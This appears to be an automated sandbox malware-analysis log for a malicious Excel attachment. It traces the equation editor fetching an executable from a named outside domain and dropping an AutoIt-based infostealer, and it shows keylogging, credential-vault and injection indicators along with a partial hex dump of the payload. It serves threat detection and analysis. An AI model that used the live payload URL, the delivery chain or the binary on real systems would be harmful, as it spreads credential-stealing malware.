                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: application/x-msdownloadlast-modified: Tue, 10 Dec 2024 07:12:19 GMTaccept-ranges: bytescontent-length: 1051136date: Tue, 10 Dec 2024 13:20:52 GMTserver: LiteSpeedData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bd 94 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 28 07 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 10 00 00 04 00 00 ed 89 10 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 10 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 80 03 00 00 70 0c 00 00 82 03 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 00 10 00 00 72 00 00 00 98 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: Joe Sandbox ViewASN Name: GTDCOLOMBIASASCO GTDCOLOMBIASASCO
                  Source: global trafficHTTP traffic detected: GET /ngbx/ngown.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: aquafusion.com.coConnection: Keep-Alive
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035604F5 URLDownloadToFileW,2_2_035604F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJump to behavior
                  Source: global trafficHTTP traffic detected: GET /ngbx/ngown.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: aquafusion.com.coConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: aquafusion.com.co
                  Source: EQNEDT32.EXE, 00000002.00000002.486608016.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.482907203.000000000092E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exe
                  Source: EQNEDT32.EXE, 00000002.00000003.482907203.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exeG
                  Source: EQNEDT32.EXE, 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.486608016.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exejjC:
                  Source: EQNEDT32.EXE, 00000002.00000003.482907203.000000000092E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exeroC:
                  Source: ghxtg8op.exe, 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, POq2Ux.cs.Net Code: _6JpPt
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DB4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00DB4164
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DB4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00DB4164
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DB3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00DB3F66
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_00DA001C
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DCCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00DCCABC

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: This is a third-party compiled AutoIt script.5_2_00D43B3A
                  Source: ghxtg8op.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ghxtg8op.exe, 00000005.00000000.482962513.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_40e8bbe4-3
                  Source: ghxtg8op.exe, 00000005.00000000.482962513.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_76590463-5
                  Source: ghxtg8op.exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_75893458-1
                  Source: ghxtg8op.exe.2.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0d9a80bb-f
                  Source: ngown[1].exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b69e3b96-c
                  Source: ngown[1].exe.2.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3230f00c-0
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00DAA1EF
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D98310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00D98310
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00DA51BD
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D4E6A05_2_00D4E6A0
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D631875_2_00D63187
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D6D9755_2_00D6D975
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D621C55_2_00D621C5
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D762D25_2_00D762D2
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DC03DA5_2_00DC03DA
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D7242E5_2_00D7242E
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D625FA5_2_00D625FA
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D566E15_2_00D566E1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D9E6165_2_00D9E616
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D7878F5_2_00D7878F
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA88895_2_00DA8889
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DC08575_2_00DC0857
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D768445_2_00D76844
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D588085_2_00D58808
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D6CB215_2_00D6CB21
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D76DB65_2_00D76DB6
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D56F9E5_2_00D56F9E
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D530305_2_00D53030
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D6F1D95_2_00D6F1D9
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D412875_2_00D41287
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D614845_2_00D61484
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D555205_2_00D55520
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D676965_2_00D67696
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D557605_2_00D55760
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D619785_2_00D61978
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D79AB55_2_00D79AB5
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D4FCE05_2_00D4FCE0
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DC7DDB5_2_00DC7DDB
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D61D905_2_00D61D90
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D6BDA65_2_00D6BDA6
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D53FE05_2_00D53FE0
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D4DF005_2_00D4DF00
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_009951085_2_00995108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_002D39086_2_002D3908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_002DB1586_2_002DB158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_002D45206_2_002D4520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_002DE6086_2_002DE608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_002D3C506_2_002D3C50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003E58E86_2_003E58E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003E09D06_2_003E09D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_002DB51A6_2_002DB51A
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: String function: 00D60AE3 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: String function: 00D68900 appears 42 times
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: String function: 00D47DE1 appears 35 times
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@1/1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAA06A GetLastError,FormatMessageW,5_2_00DAA06A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D981CB AdjustTokenPrivileges,CloseHandle,5_2_00D981CB
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_00D987E1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_00DAB3FB
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DBEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_00DBEE0D
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAC397 CoInitialize,CoCreateInstance,CoUninitialize,5_2_00DAC397
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00D44E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_00D44E89
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Nova naredba_HR-WJO-12-10-2024.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9AB8.tmpJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsxReversingLabs: Detection: 65%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeSection loaded: wow64win.dllJump to behavior
